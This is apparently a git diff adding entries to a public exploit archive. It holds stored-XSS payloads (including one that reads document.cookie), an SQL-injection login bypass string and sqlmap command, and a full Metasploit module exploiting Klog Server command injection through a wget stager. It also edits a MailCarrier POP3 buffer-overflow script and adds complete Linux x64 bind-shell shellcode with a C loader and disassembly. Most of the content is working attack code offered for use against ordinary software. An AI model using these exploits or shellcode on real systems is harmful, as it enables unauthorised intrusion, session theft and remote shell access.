diff --git a/exploits/php/webapps/49467.txt b/exploits/php/webapps/49467.txt
new file mode 100644
index 000000000..894749740
--- /dev/null
+++ b/exploits/php/webapps/49467.txt
@@ -0,0 +1,29 @@
+# Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
+# Date: 1/21/2021
+# Author: 0xB9
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
+# Version: 1.0
+# Tested on: Windows 10
+
+1. Description:
+MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed.
+
+
+2. Proof of Concept:
+
+~ XSS via Thread/Post ~
+- Make a new thread or reply to an existing thread
+- Input a payload in either the thread title or main post itself
+Payload will execute when visiting your profile.
+
+~ XSS via Location/Bio ~
+- Go to User CP -> Edit Profile
+- Input a payload in the Location/Bio
+Payload will execute when visiting your profile.
+
+~ CSRF ~
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49468.txt b/exploits/php/webapps/49468.txt
new file mode 100644
index 000000000..f66b049f4
--- /dev/null
+++ b/exploits/php/webapps/49468.txt
@@ -0,0 +1,113 @@
+# Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
+# Date: 2021-01-23
+# Exploit Author: Deha Berkin Bir
+# Vendor Homepage: https://collabtive.o-dyn.de/
+# Version: 3.1
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Login to your account.
+2- Go to the profile edit page and write your XSS/HTML payload into "Address" section.
+- You will see the executed HTML payload at there. (HTML Injection)
+- You will see the executed XSS payload at profile edit section. (XSS)
+
+==> Executed Payloads <==
+
+XSS Payload ==> " onfocus="alert(1)" autofocus="
+HTML Payload ==> DehaBerkinBir
+
+==> HTTP Request <==
+
+POST /manageuser.php?action=edit HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://(HOST)/manageuser.php?action=editform&id=1
+Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297
+Content-Length: 2327
+Connection: close
+Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g
+Upgrade-Insecure-Requests: 1
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="name"
+
+admin
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="userfile"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="file-avatar"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="company"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="email"
+
+dehaberkinbir@hotmail.com
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="web"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="tel1"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="tel2"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="address1"
+
+" onfocus="alert(1)" autofocus="
+-----------------------------12097618915709137911841560297
+
+Content-Disposition: form-data; name="zip"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="address2"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="country"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="state"
+
+admin
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="gender"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="locale"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="admin"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="oldpass"
+
+admin
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="newpass"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="repeatpass"
+
+
+-----------------------------12097618915709137911841560297--
\ No newline at end of file
diff --git a/exploits/php/webapps/49469.txt b/exploits/php/webapps/49469.txt
new file mode 100644
index 000000000..11445358f
--- /dev/null
+++ b/exploits/php/webapps/49469.txt
@@ -0,0 +1,17 @@
+# Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS
+# Exploit Author: Anita Gaud
+# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1
+# Tested on Windows
+
+*XSS IMPACT:*
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: First Name
+
+*Steps to reproduce:*
+1: Log in with a valid username and password. Navigate to the Users tab (http://localhost/Final/Final/users.php) on the left-hand side.
+2: Add the new user and then add the payload in First Name parameter and click on save button. Post Saved successfully.
+3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.
\ No newline at end of file
diff --git a/exploits/php/webapps/49470.txt b/exploits/php/webapps/49470.txt
new file mode 100644
index 000000000..0e6355319
--- /dev/null
+++ b/exploits/php/webapps/49470.txt
@@ -0,0 +1,29 @@
+# Exploit Title: CASAP Automated Enrollment System 1.0 - 'route' Stored XSS
+# Exploit Author: Richard Jones
+# Date: 2021-01/23
+# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
+
+# Steps to reproduce
+# 1. login bypass username: admin, password: `' or 1=1#
+# 2. Studants > Edit > "ROUTE" field enter.. "
+# Save, reload page, exploited stored XXS
+
+
+POST /Final/update_student.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 297
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/Final/edit_stud.php?id=6
+Cookie: PHPSESSID=97qoeda9h6djjis5gbr00p7ndc
+
+student_id=6&status=half&fname=Ronel&mname=G.&lname=Ortega&gender=Male&dob=1999-06-16&address=Prk.1+brgy.banago+bacolod+city&student_class=ICT+-+Computer+Programming&transport=yes&route=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&gfname=Juanita&gmname=S.&glname=a&rship=Mother&tel=0912312445
\ No newline at end of file
diff --git a/exploits/php/webapps/49471.txt b/exploits/php/webapps/49471.txt
new file mode 100644
index 000000000..bd2a821bd
--- /dev/null
+++ b/exploits/php/webapps/49471.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Library System 1.0 - 'category' SQL Injection
+# Exploit Author: Aitor Herrero
+# Date: 2021-01-22
+# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
+# Software Link: https://www.sourcecodester.com/php/12275/library-system-using-php.html
+# Version: 1.0
+# Tested On: Windows 10 + XAMPP 7.4.4
+# Description: Library System 1.0
+
+#STEP 1 : Go to the principal main
+#STEP 2 : Choose a category example :http://localhost:8080/libsystem/libsystem/index.php?category=3
+#STEP 3: Run your sqlmap example:
+sqlmap -u "http://localhost:8080/libsystem/libsystem/index.php?category=3" --dbs
\ No newline at end of file
diff --git a/exploits/php/webapps/49474.rb b/exploits/php/webapps/49474.rb
new file mode 100755
index 000000000..4636d4c5d
--- /dev/null
+++ b/exploits/php/webapps/49474.rb
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability',
+ 'Description' => %q{
+ This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
+ "user" parameter is executed via shell_exec() function without input validation.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [ 'B3KC4T', # Vulnerability discovery
+ 'Metin Yunus Kandemir', # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2020-35729'],
+ ['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
+ ],
+
+ 'DefaultOptions' =>
+ {
+ 'HttpClientTimeout' => 2,
+ },
+ 'Platform' => [ 'unix', 'linux' ],
+ 'Arch' => [ ARCH_X64 ],
+ 'Targets' => [
+ ['Klog Server 2.4.1 (x64)', {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X64,
+ }],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "2021-01-05",
+ 'DefaultTarget' => 0))
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptBool.new('SSL', [true, 'Use SSL', true]),
+ OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),
+ ]
+ )
+ end
+
+ def filter_bad_chars(cmd)
+ cmd.gsub!(/chmod \+x/, 'chmod 777')
+ cmd.gsub!(/;/, " %0A ")
+ cmd.gsub!(/ /, '+')
+ cmd.gsub!(/\//, '%2F')
+
+ end
+
+ def execute_command(cmd, opts = {})
+ command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"
+
+ print_status("Sending stager payload...")
+ uri = target_uri.path
+ res= send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
+ 'encode_params' => false,
+ 'vars_post' => {
+ 'user' => command_payload,
+ 'pswd' => "inline"
+ }
+ })
+ if res && res.code == 302
+ print_error("The target is not vulnerable!")
+ else
+ print_good("The target is vulnerable!")
+ end
+ end
+
+ def check
+ uri = target_uri.path
+ res= send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
+ 'encode_params' => false,
+ 'vars_post' => {
+ 'user' => "unsafe+%22%26sleep+40%26%22", #checking blind command injection via sleep
+ 'pswd' => "inline"
+ }
+ })
+ if res && res.code == 302
+ return Exploit::CheckCode::Safe
+ else
+ return Exploit::CheckCode::Vulnerable
+ end
+ end
+
+ def exploit
+ print_status("Exploiting...")
+ execute_cmdstager(flavor: :wget, delay: 10)
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/47554.py b/exploits/windows/remote/47554.py
index c71a7de2f..7e6d0e712 100755
--- a/exploits/windows/remote/47554.py
+++ b/exploits/windows/remote/47554.py
@@ -48,11 +48,12 @@ buf += "\x32\xb4\xfe\x5c"
jmpesp = '\x23\x49\xA1\x0F'
+# buffer length depends on length of source ip address, 5095 works for xxx.xxx.xx.x, you may need to tweak the length up or down
#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
-#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+#buffer = '\x41' * 5094 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
buffer = '\x41' * 5095 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+#buffer = '\x41' * 5096 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5097 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
-#buffer = '\x41' * 5099 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
diff --git a/files_exploits.csv b/files_exploits.csv
index 3aadaee24..a0734ca12 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43663,3 +43663,9 @@ id,file,description,date,author,type,platform,port
49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",2021-01-22,"Himanshu Shukla",webapps,php,
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",2021-01-22,Hodorsec,webapps,multiple,
49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",2021-01-22,46o60,webapps,multiple,
+49467,exploits/php/webapps/49467.txt,"MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF",2021-01-25,0xB9,webapps,php,
+49468,exploits/php/webapps/49468.txt,"Collabtive 3.1 - 'address' Persistent Cross-Site Scripting",2021-01-25,"Deha Berkin Bir",webapps,php,
+49469,exploits/php/webapps/49469.txt,"CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS",2021-01-25,"Anita Gaud",webapps,php,
+49470,exploits/php/webapps/49470.txt,"CASAP Automated Enrollment System 1.0 - 'route' Stored XSS",2021-01-25,"Richard Jones",webapps,php,
+49471,exploits/php/webapps/49471.txt,"Library System 1.0 - 'category' SQL Injection",2021-01-25,"Aitor Herrero",webapps,php,
+49474,exploits/php/webapps/49474.rb,"Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)",2021-01-25,"Metin Yunus Kandemir",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 3ca8863af..4490a70c4 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1029,3 +1029,4 @@ id,file,description,date,author,type,platform
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86
+49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux
diff --git a/shellcodes/linux/49472.c b/shellcodes/linux/49472.c
new file mode 100644
index 000000000..757d1f662
--- /dev/null
+++ b/shellcodes/linux/49472.c
@@ -0,0 +1,107 @@
+/*
+ Exploit Title: Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
+ Author: Guillem Alminyana
+ Date: 2021-01-18
+ Platform: GNU Linux x64
+ =====================================
+ Compile:
+ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+*/
+
+#include
+#include
+
+unsigned char code[]= \
+"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x50\x5f\x52\x52\x66\x68"
+"\x11\x5c\x66\x6a\x02\x6a\x31\x58\x54\x5e\xb2\x10\x0f\x05\x6a\x32\x58\x6a\x02\x5e"
+"\x0f\x05\x6a\x2b\x58\x48\x31\xf6\x99\x0f\x05\x50\x5f\x6a\x02\x5e\x6a\x21\x58\x0f"
+"\x05\x48\xff\xce\x79\xf6\x6a\x01\x58\x49\xb9\x50\x61\x73\x73\x77\x64\x3a\x20\x41"
+"\x51\x48\x89\xe6\x6a\x08\x5a\x0f\x05\x48\x31\xc0\x48\x83\xc6\x08\x0f\x05\x48\xb8"
+"\x31\x32\x33\x34\x35\x36\x37\x38\x56\x5f\x48\xaf\x75\x1c\x48\x31\xc0\x50\x48\xbb"
+"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x50\x54\x5a\x57\x54\x5e\x6a\x3b\x58"
+"\x0f\x05";
+
+void main()
+{
+ printf("ShellCode Lenght: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+
+/*
+ ASM
+ 0: 6a 29 push 0x29
+ 2: 58 pop rax
+ 3: 6a 02 push 0x2
+ 5: 5f pop rdi
+ 6: 6a 01 push 0x1
+ 8: 5e pop rsi
+ 9: 48 31 d2 xor rdx,rdx
+ c: 0f 05 syscall
+ e: 50 push rax
+ f: 5f pop rdi
+ 10: 52 push rdx
+ 11: 52 push rdx
+ 12: 66 68 11 5c pushw 0x5c11
+ 16: 66 6a 02 pushw 0x2
+ 19: 6a 31 push 0x31
+ 1b: 58 pop rax
+ 1c: 54 push rsp
+ 1d: 5e pop rsi
+ 1e: b2 10 mov dl,0x10
+ 20: 0f 05 syscall
+ 22: 6a 32 push 0x32
+ 24: 58 pop rax
+ 25: 6a 02 push 0x2
+ 27: 5e pop rsi
+ 28: 0f 05 syscall
+ 2a: 6a 2b push 0x2b
+ 2c: 58 pop rax
+ 2d: 48 31 f6 xor rsi,rsi
+ 30: 99 cdq
+ 31: 0f 05 syscall
+ 33: 50 push rax
+ 34: 5f pop rdi
+ 35: 6a 02 push 0x2
+ 37: 5e pop rsi
+ 38: 6a 21 push 0x21
+ 3a: 58 pop rax
+ 3b: 0f 05 syscall
+ 3d: 48 ff ce dec rsi
+ 40: 79 f6 jns 38
+ 42: 6a 01 push 0x1
+ 44: 58 pop rax
+ 45: 49 b9 50 61 73 73 77 movabs r9,0x203a647773736150
+ 4c: 64 3a 20
+ 4f: 41 51 push r9
+ 51: 48 89 e6 mov rsi,rsp
+ 54: 6a 08 push 0x8
+ 56: 5a pop rdx
+ 57: 0f 05 syscall
+ 59: 48 31 c0 xor rax,rax
+ 5c: 48 83 c6 08 add rsi,0x8
+ 60: 0f 05 syscall
+ 62: 48 b8 31 32 33 34 35 movabs rax,0x3837363534333231
+ 69: 36 37 38
+ 6c: 56 push rsi
+ 6d: 5f pop rdi
+ 6e: 48 af scas rax,QWORD PTR es:[rdi]
+ 70: 75 1c jne 8e
+ 72: 48 31 c0 xor rax,rax
+ 75: 50 push rax
+ 76: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
+ 7d: 2f 73 68
+ 80: 53 push rbx
+ 81: 54 push rsp
+ 82: 5f pop rdi
+ 83: 50 push rax
+ 84: 54 push rsp
+ 85: 5a pop rdx
+ 86: 57 push rdi
+ 87: 54 push rsp
+ 88: 5e pop rsi
+ 89: 6a 3b push 0x3b
+ 8b: 58 pop rax
+ 8c: 0f 05 syscall
+
+*/
\ No newline at end of file